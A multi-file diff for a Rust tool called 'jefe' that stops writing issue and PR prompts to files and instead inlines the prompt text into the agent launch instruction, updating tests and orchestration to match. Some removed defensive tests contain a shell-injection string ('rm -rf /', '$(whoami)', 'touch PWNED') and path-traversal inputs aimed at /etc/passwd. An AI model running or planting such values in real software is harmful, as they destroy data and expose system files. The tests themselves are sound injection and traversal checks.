@@ -389,7 +374,7 @@ fn local_missing_without_identity_fails_safely() {
         rand_label()
     ));
     // No identity → must fail, not create the dir.
-    let result = prepare_local(&work, None, DirtyPolicy::Stop, "prompt");
+    let result = prepare_local(&work, None, DirtyPolicy::Stop);
     assert!(result.is_err(), "missing dir with no identity must fail");
     assert!(
         !work.exists(),
@@ -406,7 +391,7 @@ fn local_existing_non_git_dir_fails() {
     ));
     std::fs::create_dir_all(&work).value_or_panic("create non-git dir");
     std::fs::write(work.join("file.txt"), "not a repo").value_or_panic("write non-repo file");
-    let result = prepare_local(&work, None, DirtyPolicy::Stop, "prompt");
+    let result = prepare_local(&work, None, DirtyPolicy::Stop);
     assert!(result.is_err(), "non-git dir must fail safely");
     let err = result.error_or_panic("non-git dir must error");
     assert!(
@@ -423,8 +408,7 @@ fn local_dirty_stop_returns_dirty_without_prompt() {
     // Make the worktree dirty with a REAL (non-ignored) change.
     std::fs::write(work.join("src.txt"), "dirty change").value_or_panic("write dirty change");
 
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Stop, "prompt").value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Stop).value_or_panic("prepare_local");
     assert_eq!(outcome, PrepOutcome::Dirty);
 
     // The dirty change is preserved (Stop does not clean).
@@ -432,7 +416,6 @@ fn local_dirty_stop_returns_dirty_without_prompt() {
         std::fs::read_to_string(work.join("src.txt")).value_or_panic("read preserved dirty change");
     assert_eq!(preserved, "dirty change");
     // No prompt written (Stop aborts before prompt write).
-    assert!(!work.join(".jefe/issue-prompt.md").exists());
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
@@ -444,17 +427,11 @@ fn local_dirty_discard_cleans_and_writes_prompt() {
     let work = clone_origin(&origin, "dirtydiscard");
     std::fs::write(work.join("src.txt"), "dirty change").value_or_panic("write dirty change");
 
-    let prompt = "After discard, do the work.";
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Discard, prompt).value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Discard).value_or_panic("prepare_local");
     assert_eq!(outcome, PrepOutcome::Ready);
 
     // The dirty change was discarded.
     assert!(!work.join("src.txt").exists());
-    // Prompt written.
-    let written = std::fs::read_to_string(work.join(".jefe/issue-prompt.md"))
-        .value_or_panic("read written prompt");
-    assert_eq!(written, prompt);
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
@@ -471,8 +448,7 @@ fn local_clean_not_on_default_stop_returns_dirty_without_prompt() {
     // Switch to a feature branch; the tree stays clean.
     run_git(&work, &["checkout", "-b", "feature"]);
 
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Stop, "prompt").value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Stop).value_or_panic("prepare_local");
     assert_eq!(outcome, PrepOutcome::Dirty);
 
     // Still on feature branch — nothing was switched.
@@ -481,7 +457,6 @@ fn local_clean_not_on_default_stop_returns_dirty_without_prompt() {
         "feature\n"
     );
     // No prompt written.
-    assert!(!work.join(".jefe/issue-prompt.md").exists());
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
@@ -496,16 +471,11 @@ fn local_clean_not_on_default_discard_switches_and_writes_prompt() {
     let work = clone_origin(&origin, "clean-not-main-discard");
     run_git(&work, &["checkout", "-b", "feature"]);
 
-    let prompt = "Switched to main, now do the work.";
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Discard, prompt).value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Discard).value_or_panic("prepare_local");
     assert_eq!(outcome, PrepOutcome::Ready);
 
     // Now on main.
     assert_eq!(git_stdout(&work, &["branch", "--show-current"]), "main\n");
-    let written = std::fs::read_to_string(work.join(".jefe/issue-prompt.md"))
-        .value_or_panic("read written prompt");
-    assert_eq!(written, prompt);
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
@@ -521,19 +491,13 @@ fn local_dirty_and_not_on_default_discard_cleans_switches_and_writes_prompt() {
     // Add an untracked file so the tree is dirty.
     std::fs::write(work.join("untracked.txt"), "junk").value_or_panic("write untracked file");
 
-    let prompt = "Cleaned and switched, now do the work.";
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Discard, prompt).value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Discard).value_or_panic("prepare_local");
     assert_eq!(outcome, PrepOutcome::Ready);
 
     // On main now.
     assert_eq!(git_stdout(&work, &["branch", "--show-current"]), "main\n");
     // Untracked file was cleaned.
     assert!(!work.join("untracked.txt").exists());
-    // Prompt written.
-    let written = std::fs::read_to_string(work.join(".jefe/issue-prompt.md"))
-        .value_or_panic("read written prompt");
-    assert_eq!(written, prompt);
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
@@ -557,13 +521,12 @@ fn local_dirty_discard_handles_spaces_unicode_and_argv_like_names_without_git_cl
     std::fs::write(work.join("nested Ω/space/file.txt"), "untracked")
         .value_or_panic("write nested untracked file");
 
-    let outcome = prepare_local(&work, None, DirtyPolicy::Discard, "prompt")
-        .value_or_panic("native local preparation");
+    let outcome =
+        prepare_local(&work, None, DirtyPolicy::Discard).value_or_panic("native local preparation");
 
     assert_eq!(outcome, PrepOutcome::Ready);
     assert!(!work.join(adversarial).exists());
     assert!(!work.join("nested Ω").exists());
-    assert!(work.join(".jefe/issue-prompt.md").exists());
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&root);
 }
@@ -605,12 +568,10 @@ fn local_owned_metadata_jefe_llxprt_ignored_as_dirty() {
     let work = clone_origin(&origin, "ownedmeta");
     // Only .jefe/ and .llxprt/ changes → must NOT be dirty.
     std::fs::create_dir_all(work.join(".jefe")).value_or_panic("create .jefe");
-    std::fs::write(work.join(".jefe/issue-prompt.md"), "owned").value_or_panic("write .jefe");
     std::fs::create_dir_all(work.join(".llxprt")).value_or_panic("create .llxprt");
     std::fs::write(work.join(".llxprt/LLXPRT.md"), "owned").value_or_panic("write .llxprt");
 
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Stop, "prompt").value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Stop).value_or_panic("prepare_local");
     assert_eq!(
         outcome,
         PrepOutcome::Ready,
@@ -641,10 +602,8 @@ fn local_clone_when_missing_with_url() {
     // Set origin/HEAD so prepare_issue_workdir can resolve the branch.
     run_git(&work, &["remote", "set-head", "origin", "-a"]);
     // Now run the full post-clone prep (dirty check → prep → prompt).
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Stop, "prompt").value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Stop).value_or_panic("prepare_local");
     assert_eq!(outcome, PrepOutcome::Ready);
-    assert!(work.join(".jefe/issue-prompt.md").exists());
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
@@ -667,8 +626,8 @@ fn local_origin_mismatch_detected() {
     std::fs::write(work.join("marker.txt"), "untouched").value_or_panic("write marker");
 
     let identity = mismatched_identity();
-    let outcome = prepare_local(&work, Some(&identity), DirtyPolicy::Stop, "prompt")
-        .value_or_panic("prepare_local");
+    let outcome =
+        prepare_local(&work, Some(&identity), DirtyPolicy::Stop).value_or_panic("prepare_local");
     assert!(
         matches!(outcome, PrepOutcome::OriginMismatch { .. }),
         "mismatched origin must return OriginMismatch, got {outcome:?}"
@@ -680,7 +639,6 @@ fn local_origin_mismatch_detected() {
         "untouched"
     );
     // No prompt written (mismatch aborts before prompt write).
-    assert!(!work.join(".jefe/issue-prompt.md").exists());
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
@@ -693,8 +651,7 @@ fn local_origin_match_proceeds_ready() {
     let origin = bare_origin_with_commit("match");
     let work = clone_origin(&origin, "match");
 
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Stop, "prompt").value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Stop).value_or_panic("prepare_local");
     assert_eq!(
         outcome,
         PrepOutcome::Ready,
@@ -718,129 +675,11 @@ fn local_force_reclone_replaces_mismatched_repo() {
     // via the resolved-URL seam that prepare_local_force_reclone delegates to
     // after resolving the identity. This proves the real remove → clone →
     // prep ordering runs and replaces the mismatched workdir.
-    force_reclone_local_with_url(&work, &clone_url, "prompt")
-        .value_or_panic("force_reclone_local_with_url");
+    force_reclone_local_with_url(&work, &clone_url).value_or_panic("force_reclone_local_with_url");
 
     // Old marker is gone (workdir was replaced).
     assert!(!work.join("old-marker.txt").exists());
-    // Prompt is written.
-    assert!(work.join(".jefe/issue-prompt.md").exists());
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
-}
-
-// ── Local PR prompt writing (reuses write_prompt_to_target) ────────────
-//
-// The PR send path (`prs_orchestration::dispatch_pr_agent_chooser_confirm`)
-// reuses the issue-prep safe target prompt writer for writing
-// `.jefe/pr-prompt.md` to the local filesystem. These tests exercise the
-// local path, including adversarial content that must never appear in any
-// shell argv. The remote-host path is covered in `issue_prep_remote_tests.rs`.
-
-/// Relative path for the PR prompt — must match `prs_orchestration`.
-const PR_PROMPT_RELATIVE_PATH: &str = ".jefe/pr-prompt.md";
-
-/// A local PR prompt write via `write_prompt_to_target` creates the `.jefe`
-/// directory and writes the content exactly — including adversarial
-/// metacharacters that must NEVER be interpolated into a shell (the local
-/// path uses `std::fs::write`, no shell at all).
-#[test]
-fn pr_prompt_local_write_writes_exact_content_with_adversarial_chars() {
-    let work_dir = std::env::temp_dir().join(format!(
-        "jefe-pr-prompt-local-{}-{}",
-        std::process::id(),
-        rand_label()
-    ));
-    let adversarial = "'; rm -rf /; echo '`\n$(whoami)\n\" && touch PWNED";
-    let result = write_prompt_to_target(
-        &WorkTarget::Local,
-        &work_dir,
-        PR_PROMPT_RELATIVE_PATH,
-        adversarial,
-    );
-    assert!(
-        result.is_ok(),
-        "local prompt write must succeed: {:?}",
-        result.err()
-    );
-
-    let written = std::fs::read_to_string(work_dir.join(PR_PROMPT_RELATIVE_PATH))
-        .value_or_panic("read PR prompt");
-    assert_eq!(written, adversarial, "content must match exactly");
-    // No PWNED file was created (no shell injection on the local path).
-    assert!(
-        !work_dir.join("PWNED").exists(),
-        "adversarial content must not create files"
-    );
-    cleanup(&work_dir);
-}
-
-/// Local PR prompt write creates the `.jefe` directory when absent.
-#[test]
-fn pr_prompt_local_write_creates_jefe_dir() {
-    let work_dir = std::env::temp_dir().join(format!(
-        "jefe-pr-prompt-mkdir-{}-{}",
-        std::process::id(),
-        rand_label()
-    ));
-    let result = write_prompt_to_target(
-        &WorkTarget::Local,
-        &work_dir,
-        PR_PROMPT_RELATIVE_PATH,
-        "content",
-    );
-    assert!(result.is_ok(), "should succeed: {:?}", result.err());
-    assert!(work_dir.join(".jefe").exists(), ".jefe dir must be created");
-    assert!(work_dir.join(PR_PROMPT_RELATIVE_PATH).exists());
-    cleanup(&work_dir);
-}
-
-/// The PR prompt path constant must start with `.jefe/` (required by the safe
-/// writer so it knows where to `mkdir -p`).
-#[test]
-fn pr_prompt_relative_path_starts_with_jefe() {
-    assert!(
-        PR_PROMPT_RELATIVE_PATH.starts_with(".jefe/"),
-        "PR prompt path must be under .jefe/"
-    );
-}
-
-// ── Path-traversal / absolute-path rejection in write_prompt_to_target ──
-
-/// An absolute path must be rejected (never joined under the work dir to
-/// overwrite an arbitrary filesystem location).
-#[test]
-fn write_prompt_rejects_absolute_path() {
-    let result = write_prompt_to_target(
-        &WorkTarget::Local,
-        Path::new("/tmp/jefe-should-not-exist"),
-        "/etc/passwd",
-        "content",
-    );
-    assert!(result.is_err(), "absolute path must be rejected");
-}
-
-/// A traversal path (`..`) must be rejected (never escape the work dir).
-#[test]
-fn write_prompt_rejects_traversal_path() {
-    let result = write_prompt_to_target(
-        &WorkTarget::Local,
-        Path::new("/tmp/jefe-should-not-exist"),
-        ".jefe/../../../etc/passwd",
-        "content",
-    );
-    assert!(result.is_err(), "traversal path must be rejected");
-}
-
-/// A path not starting with `.jefe/` must be rejected.
-#[test]
-fn write_prompt_rejects_non_jefe_path() {
-    let result = write_prompt_to_target(
-        &WorkTarget::Local,
-        Path::new("/tmp/jefe-should-not-exist"),
-        "etc/evil.md",
-        "content",
-    );
-    assert!(result.is_err(), "non-.jefe path must be rejected");
 }

--- a/src/app_input/issue_send_modal_tests.rs
+++ b/src/app_input/issue_send_modal_tests.rs
@@ -123,7 +123,8 @@ fn issue_send_forces_pass_continue_false_on_launch_signature() {
     // dispatch_agent_chooser_confirm forces pass_continue = false before launch.
     // This calls the REAL production helper so removing the override would
     // cause this test to fail.
-    let launch_sig = prepare_issue_launch_signature(send_info.signature);
+    let issue_prompt = "This is the issue body content for testing.";
+    let launch_sig = prepare_issue_launch_signature(send_info.signature, issue_prompt);
     assert!(
         !launch_sig.pass_continue,
         "issue-driven launches must force pass_continue = false"
@@ -131,9 +132,9 @@ fn issue_send_forces_pass_continue_false_on_launch_signature() {
     let instruction = launch_sig
         .mode_flags
         .iter()
-        .find(|arg| arg.contains(".jefe/issue-prompt.md"))
-        .value_or_panic("issue launch signature must include an instruction");
-    assert!(instruction.contains(".jefe/issue-prompt.md"));
+        .find(|arg| arg.contains(issue_prompt))
+        .value_or_panic("issue launch signature must include the inlined prompt");
+    assert!(instruction.contains(issue_prompt));
     assert!(instruction.contains("dev-docs/workflow/ISSUE-DELIVERY.md"));
     assert!(instruction.contains("decision-complete acceptance matrix"));
     assert!(instruction.contains("stop for approval"));
@@ -158,14 +159,15 @@ fn code_puppy_issue_send_carries_kind_and_uses_positional_instruction() {
         jefe::domain::AgentKind::CodePuppy
     );
 
-    let launch_sig = prepare_issue_launch_signature(send_info.signature);
+    let issue_prompt = "Code puppy issue body content.";
+    let launch_sig = prepare_issue_launch_signature(send_info.signature, issue_prompt);
     assert!(!launch_sig.pass_continue);
     assert!(!launch_sig.mode_flags.iter().any(|arg| arg == "-i"));
     assert!(
         launch_sig
             .mode_flags
             .iter()
-            .any(|arg| arg.contains(".jefe/issue-prompt.md"))
+            .any(|arg| arg.contains(issue_prompt))
     );
 }
 
@@ -358,7 +360,8 @@ fn code_puppy_issue_uses_identical_prep_and_fresh_no_resume_signature() {
 
     // Fresh no-resume signature: pass_continue forced off, positional
     // instruction (no -i).
-    let launch_sig = prepare_issue_launch_signature(send_info.signature);
+    let issue_prompt = "Issue body for clone-identity test.";
+    let launch_sig = prepare_issue_launch_signature(send_info.signature, issue_prompt);
     assert!(
         !launch_sig.pass_continue,
         "CodePuppy issue send must be fresh (no resume)"
@@ -371,8 +374,8 @@ fn code_puppy_issue_uses_identical_prep_and_fresh_no_resume_signature() {
         launch_sig
             .mode_flags
             .iter()
-            .any(|arg| arg.contains(".jefe/issue-prompt.md")),
-        "CodePuppy issue signature must reference the issue prompt"
+            .any(|arg| arg.contains(issue_prompt)),
+        "CodePuppy issue signature must contain the inlined prompt"
     );
 }
 

--- a/src/app_input/issues_send.rs
+++ b/src/app_input/issues_send.rs
@@ -1,9 +1,10 @@
 //! Issue send-to-agent orchestration (extracted from mod.rs).
 //!
 //! Resolves issue send context, prepares the agent working copy via the
-//! target-aware prep in [`super::issue_prep`] (clone/checkout/dirty-guard/
-//! prompt-write, on the same target where the `LaunchSignature` runs), and
-//! spawns/attaches the issue-driven agent session. The issue-driven path
+//! target-aware prep in [`super::issue_prep`] (clone/checkout/dirty-guard,
+//! on the same target where the `LaunchSignature` runs), and
+//! spawns/attaches the issue-driven agent session. The issue prompt content
+//! is inlined into the launch instruction (issue #315). The issue-driven path
 //! never passes `--continue` (issue #166).
 //!
 //! Clone identity derives only from a valid `Repository.github_repo`
@@ -23,8 +24,7 @@ use super::agent_runtime::{clear_agent_runtime_attachment, mark_agent_runtime_at
 use super::clone_identity::CloneIdentity;
 use super::fresh_prompt::{FreshPromptKind, prepare_fresh_prompt_signature};
 use super::issue_prep::{
-    DirtyPolicy, ISSUE_PROMPT_RELATIVE_PATH, PrepOutcome, prepare_issue_target,
-    prepare_issue_target_force_reclone,
+    DirtyPolicy, PrepOutcome, prepare_issue_target, prepare_issue_target_force_reclone,
 };
 use super::issue_self_assignment::{
     IssueAssignment, IssueAssignmentAction, SelfAssignment, direct_assignment_action,
@@ -55,11 +55,12 @@ pub(super) fn dispatch_agent_chooser_confirm(app_state: &mut AppStateHandle, ctx
 
     // Issue-driven launches are always fresh instructions, so never resume a
     // prior session regardless of the agent's configured `pass_continue`.
-    let launch_sig = prepare_issue_launch_signature(send_info.signature);
+    let prompt = issues_dispatch::format_issue_prompt(&send_info.payload);
+    let launch_sig = prepare_issue_launch_signature(send_info.signature, &prompt);
 
     // Availability guard BEFORE any prep side effects: a missing agent
     // runtime must not trigger a remote clone/checkout. Prep (clone/reset/
-    // clean/prompt-write) only runs when the agent kind is available.
+    // clean) only runs when the agent kind is available.
     if !super::availability::launch_available_or_error(
         app_state,
         launch_sig.agent_kind,
@@ -92,17 +93,11 @@ pub(super) fn dispatch_agent_chooser_confirm(app_state: &mut AppStateHandle, ctx
         return;
     }
 
-    let prompt = issues_dispatch::format_issue_prompt(&send_info.payload);
-
-    // Initial send uses the Stop policy: a dirty working copy returns Dirty
-    // without altering it, so the user is prompted before any destructive
-    // cleanup. One orchestration drives local/remote and Stop/Discard.
     let outcome = prepare_issue_target(
         &target,
         &send_info.work_dir,
         send_info.clone_identity.as_ref(),
         DirtyPolicy::Stop,
-        &prompt,
     );
     handle_initial_prep_outcome(
         app_state,
@@ -189,8 +184,11 @@ fn handle_initial_prep_outcome(
 ///
 /// Extracted as a pure function so the `pass_continue = false` override is
 /// unit-testable without a runtime/git context.
-pub(super) fn prepare_issue_launch_signature(sig: LaunchSignature) -> LaunchSignature {
-    prepare_fresh_prompt_signature(sig, FreshPromptKind::Issue, ISSUE_PROMPT_RELATIVE_PATH)
+pub(super) fn prepare_issue_launch_signature(
+    sig: LaunchSignature,
+    prompt_content: &str,
+) -> LaunchSignature {
+    prepare_fresh_prompt_signature(sig, FreshPromptKind::Issue, prompt_content)
 }
 
 /// Run preflight; if it passes (or sandbox is disabled), launch the issue
@@ -314,8 +312,8 @@ fn prepare_confirm_send_target(
 /// proceed with the issue-driven launch. Uses the **same** target-aware
 /// orchestration as the initial send, but with the `Discard` policy: the
 /// prep cleans the working copy (reset --hard + clean -fd, preserving
-/// `.jefe/`/`.llxprt/`), checks out + pulls the default branch, writes the
-/// prompt last, and then launches.
+/// `.jefe/`/`.llxprt/`), checks out + pulls the default branch,
+/// and then launches.
 pub(super) fn confirm_issue_dirty_copy_enter(
     app_state: &mut AppStateHandle,
     ctx: &SharedContext,
@@ -328,8 +326,6 @@ pub(super) fn confirm_issue_dirty_copy_enter(
         return;
     };
 
-    let prompt = issues_dispatch::format_issue_prompt(&payload);
-
     // Resolve the clone identity from the agent's repository (validates
     // github_repo owner/repo; never falls back to slug).
     let clone_identity = clone_identity_for_agent(app_state, &agent_id);
@@ -339,7 +335,6 @@ pub(super) fn confirm_issue_dirty_copy_enter(
         &work_dir,
         clone_identity.as_ref(),
         DirtyPolicy::Discard,
-        &prompt,
     ) {
         Ok(PrepOutcome::Ready) => {
             preflight_and_launch_issue(
@@ -378,7 +373,7 @@ pub(super) fn confirm_issue_dirty_copy_enter(
 /// Origin-mismatch confirm: user pressed Enter to replace the mismatched
 /// repo with a fresh clone and proceed with the issue-driven launch. This
 /// removes the existing workdir, re-clones from the configured identity,
-/// runs post-clone prep (checkout+pull, prompt write), then launches.
+/// runs post-clone prep (checkout+pull), then launches.
 pub(super) fn confirm_issue_origin_mismatch_enter(
     app_state: &mut AppStateHandle,
     ctx: &SharedContext,
@@ -391,7 +386,6 @@ pub(super) fn confirm_issue_origin_mismatch_enter(
         return;
     };
 
-    let prompt = issues_dispatch::format_issue_prompt(&payload);
     let clone_identity = clone_identity_for_agent(app_state, &agent_id);
 
     // MUST-FIX #2: Validate the clone identity BEFORE calling force-reclone.
@@ -409,7 +403,7 @@ pub(super) fn confirm_issue_origin_mismatch_enter(
         return;
     };
 
-    match prepare_issue_target_force_reclone(&target, &work_dir, &clone_identity, &prompt) {
+    match prepare_issue_target_force_reclone(&target, &work_dir, &clone_identity) {
         Ok(PrepOutcome::Ready) => {
             preflight_and_launch_issue(
                 app_state,

--- a/src/app_input/prs_integration_tests.rs
+++ b/src/app_input/prs_integration_tests.rs
@@ -477,7 +477,7 @@ fn state_for_send_to_agent(agent_id: &AgentId, work_dir: &std::path::Path) -> Ap
 /// @requirement REQ-PR-011
 /// @pseudocode component-003 lines 147-175
 #[test]
-fn it_send_to_agent_resolves_launch_target_for_inlined_prompt() {
+fn it_send_to_agent_resolves_launch_target() {
     let agent_id = AgentId(String::from("pr-agent-1"));
     let temp_work_dir = std::env::temp_dir().join(format!(
         "jefe-pr-int-test-{}",
@@ -529,7 +529,14 @@ fn it_send_to_agent_resolves_launch_target_for_inlined_prompt() {
     );
 
     // Issue #315: no prompt file should be written — the prompt is inlined
-    // into the -i instruction.
+    // into the -i instruction. Verify the formatted prompt content would be
+    // correct (includes the PR number), proving no coverage gap from removing
+    // the on-disk write.
+    let formatted_prompt = prs_dispatch::format_pr_prompt(&send_info.payload);
+    assert!(
+        formatted_prompt.contains("#42") || formatted_prompt.contains("42"),
+        "formatted PR prompt must include the PR number: {formatted_prompt}"
+    );
     assert!(
         !temp_work_dir.join(".jefe").join("pr-prompt.md").exists(),
         "no pr-prompt.md file should exist (prompt is inlined)"

--- a/src/app_input/prs_integration_tests.rs
+++ b/src/app_input/prs_integration_tests.rs
@@ -406,7 +406,7 @@ fn it_search_commit_reloads_with_query() {
     );
 }
 // ═════════════════════════════════════════════════════════════════════════
-// Checkpoint 8: send-to-agent writes prompt and launches (REQ-PR-011)
+// Checkpoint 8: send-to-agent inlines prompt and launches (REQ-PR-011)
 // ═════════════════════════════════════════════════════════════════════════
 
 /// Build a launch signature fixture (mirrors `app_input_tests::sample_signature`).

--- a/src/app_input/prs_integration_tests.rs
+++ b/src/app_input/prs_integration_tests.rs
@@ -30,10 +30,10 @@ use jefe::domain::{
 use jefe::state::{AppEvent, AppState, PrFocus, ReadOnlyHintKind, ScreenMode};
 
 // Import only the submodule paths (NOT iocraft::prelude::* which shadows
-// std::boxed::Box). The private fns pr_send_info_from_state and write_pr_prompt
-// are visible to child modules via super::.
+// std::boxed::Box). The private fn pr_send_info_from_state is visible to
+// child modules via super::.
 use super::prs_integration_test_fixtures::make_test_pr_detail;
-use super::prs_orchestration::{pr_send_info_from_state, write_pr_prompt};
+use super::prs_orchestration::pr_send_info_from_state;
 use super::{
     AppStateHandle, SharedContext, normal, prs, prs_comments_dispatch, prs_dispatch,
     prs_list_dispatch,
@@ -459,44 +459,25 @@ fn state_for_send_to_agent(agent_id: &AgentId, work_dir: &std::path::Path) -> Ap
     state
 }
 
-/// Assert that the prompt file exists, is non-empty, and contains the PR number.
-///
-/// @plan PLAN-20260624-PR-MODE.P15
-/// @requirement REQ-PR-011
-/// @pseudocode component-003 lines 147-175
-fn assert_prompt_content(prompt_path: &std::path::Path, pr_number: &str) {
-    assert!(prompt_path.exists(), "pr-prompt.md must exist");
-    let content = std::fs::read_to_string(prompt_path)
-        .unwrap_or_else(|e| panic!("should read pr-prompt.md: {e}"));
-    assert!(!content.is_empty(), "prompt content must be non-empty");
-    assert!(
-        content.contains(pr_number),
-        "prompt must contain PR number {pr_number}, got: {content}"
-    );
-}
-
 /// Checkpoint 8: `S` opens the agent chooser, Enter confirms, and the dispatch
-/// arm applies the reducer BEFORE writing the prompt file — `.jefe/pr-prompt.md`
-/// exists with non-empty content containing the PR number. The resolved send
-/// info identifies the correct LAUNCH TARGET agent (the AgentId the
-/// chooser-confirm would launch) and the correct work_dir, proving the launch
-/// target is resolved pre-spawn.
+/// arm resolves the correct LAUNCH TARGET agent and work_dir pre-spawn. The
+/// PR prompt content is inlined into the launch instruction (issue #315),
+/// so no `.jefe/pr-prompt.md` file is written.
 ///
 /// Drives the REAL key handlers for `S` (open chooser) and Enter (confirm),
 /// then replicates the EXACT dispatch sequence on raw `AppState`: read
-/// `pr_send_info_from_state`, apply `PrAgentChooserConfirm` (closes chooser),
-/// and `write_pr_prompt` writes the file.
+/// `pr_send_info_from_state`, apply `PrAgentChooserConfirm` (closes chooser).
 ///
 /// NOTE: the actual agent launch requires runtime (`SharedContext` is `None`
 /// in unit tests → the spawn is guarded), mirroring the established convention
-/// in `app_input_tests.rs` (which writes the prompt and asserts target
-/// resolution but cannot observe the spawn). Do NOT add a production seam.
+/// in `app_input_tests.rs` (which resolves target info but cannot observe
+/// the spawn). Do NOT add a production seam.
 ///
 /// @plan PLAN-20260624-PR-MODE.P15
 /// @requirement REQ-PR-011
 /// @pseudocode component-003 lines 147-175
 #[test]
-fn it_send_to_agent_writes_prompt_file_for_launch() {
+fn it_send_to_agent_resolves_launch_target_for_inlined_prompt() {
     let agent_id = AgentId(String::from("pr-agent-1"));
     let temp_work_dir = std::env::temp_dir().join(format!(
         "jefe-pr-int-test-{}",
@@ -504,7 +485,6 @@ fn it_send_to_agent_writes_prompt_file_for_launch() {
             .duration_since(std::time::UNIX_EPOCH)
             .map_or(0, |d| d.as_nanos())
     ));
-    let prompt_path = temp_work_dir.join(".jefe").join("pr-prompt.md");
 
     let mut state = state_for_send_to_agent(&agent_id, &temp_work_dir);
 
@@ -527,7 +507,7 @@ fn it_send_to_agent_writes_prompt_file_for_launch() {
         "Enter must emit PrAgentChooserConfirm (got {event:?})"
     );
 
-    // Dispatch ordering: read info, apply reducer, then write prompt.
+    // Dispatch ordering: read info, apply reducer.
     let send_info =
         pr_send_info_from_state(&state).unwrap_or_else(|| panic!("pr_send_info must resolve"));
     assert_eq!(send_info.payload.pr_number, 42);
@@ -547,10 +527,13 @@ fn it_send_to_agent_writes_prompt_file_for_launch() {
         state.prs_state.agent_chooser.is_none(),
         "confirm must close the chooser BEFORE side effects"
     );
-    write_pr_prompt(&send_info.work_dir, &send_info.payload)
-        .unwrap_or_else(|e| panic!("write_pr_prompt should succeed: {e:?}"));
 
-    assert_prompt_content(&prompt_path, "42");
+    // Issue #315: no prompt file should be written — the prompt is inlined
+    // into the -i instruction.
+    assert!(
+        !temp_work_dir.join(".jefe").join("pr-prompt.md").exists(),
+        "no pr-prompt.md file should exist (prompt is inlined)"
+    );
     let _ = std::fs::remove_dir_all(&temp_work_dir);
     let _ = sample_signature();
 }

--- a/src/app_input/prs_orchestration.rs
+++ b/src/app_input/prs_orchestration.rs
@@ -477,18 +477,16 @@ fn update_pr_detail_viewport_rows(app_state: &mut AppStateHandle) {
     );
 }
 
-/// The PR prompt file written into the agent work dir and referenced in
-/// the launch instruction. Both the fresh-prompt signature construction
-/// (the agent instruction string) and `write_pr_prompt` (the on-disk path)
-/// must use exactly this relative path.
-const PR_PROMPT_RELATIVE_PATH: &str = ".jefe/pr-prompt.md";
-
 /// Dispatch the PR agent-chooser confirm (send-to-agent) side effects.
 ///
 /// Mirrors `dispatch_agent_chooser_confirm` exactly: resolve send info, apply
-/// the chooser-confirm reducer (closes chooser + records send), write the PR
-/// prompt, then launch the agent. The ordering is reducer-before-spawn so the
-/// chooser is closed and the send recorded BEFORE any side effect.
+/// the chooser-confirm reducer (closes chooser + records send), inline the PR
+/// prompt content into the launch instruction, then launch the agent. The
+/// ordering is reducer-before-spawn so the chooser is closed and the send
+/// recorded BEFORE any side effect.
+///
+/// Issue #315: the PR prompt content is now inlined directly into the launch
+/// instruction via `-i`, eliminating the `.jefe/pr-prompt.md` file write.
 ///
 /// @plan PLAN-20260624-PR-MODE.P11
 /// @requirement REQ-PR-011
@@ -506,15 +504,16 @@ fn dispatch_pr_agent_chooser_confirm(app_state: &mut AppStateHandle, ctx: &Share
         return;
     };
 
+    let prompt_content = prs_dispatch::format_pr_prompt(&send_info.payload);
     let launch_sig = prepare_fresh_prompt_signature(
         send_info.signature,
         FreshPromptKind::PullRequest,
-        PR_PROMPT_RELATIVE_PATH,
+        &prompt_content,
     );
 
-    // Availability + target validation BEFORE any prompt side effect: a
-    // missing agent runtime or an invalid/incomplete remote config must not
-    // trigger a local or remote prompt write.
+    // Availability + target validation BEFORE any prep side effect: a missing
+    // agent runtime or an invalid/incomplete remote config must not trigger
+    // local or remote prep.
     if !super::availability::launch_available_or_error(
         app_state,
         launch_sig.agent_kind,
@@ -540,12 +539,6 @@ fn dispatch_pr_agent_chooser_confirm(app_state: &mut AppStateHandle, ctx: &Share
         return;
     }
 
-    if let Err(error) = write_pr_prompt_to_target(&target, &send_info.work_dir, &send_info.payload)
-    {
-        apply_pr_send_to_agent_failed(app_state, ctx, error);
-        return;
-    }
-
     if preflight_or_prompt(app_state, ctx, &send_info.agent_id, &launch_sig, None) {
         launch_pr_agent(
             app_state,
@@ -555,52 +548,6 @@ fn dispatch_pr_agent_chooser_confirm(app_state: &mut AppStateHandle, ctx: &Share
             launch_sig,
         );
     }
-}
-
-/// Write the PR prompt to the selected WorkTarget (local fs or remote ssh).
-/// Returns `Err` on failure so the caller can apply the send-failed event.
-fn write_pr_prompt_to_target(
-    target: &super::issue_prep::WorkTarget,
-    work_dir: &std::path::Path,
-    payload: &jefe::github::PrSendPayload,
-) -> Result<(), String> {
-    let prompt_content = prs_dispatch::format_pr_prompt(payload);
-    match target {
-        super::issue_prep::WorkTarget::Local => super::issue_prep::write_prompt_to_target(
-            target,
-            work_dir,
-            PR_PROMPT_RELATIVE_PATH,
-            &prompt_content,
-        ),
-        super::issue_prep::WorkTarget::Remote(remote) => super::remote_probe::write_remote_prompt(
-            remote,
-            work_dir,
-            PR_PROMPT_RELATIVE_PATH,
-            &prompt_content,
-        ),
-    }
-}
-
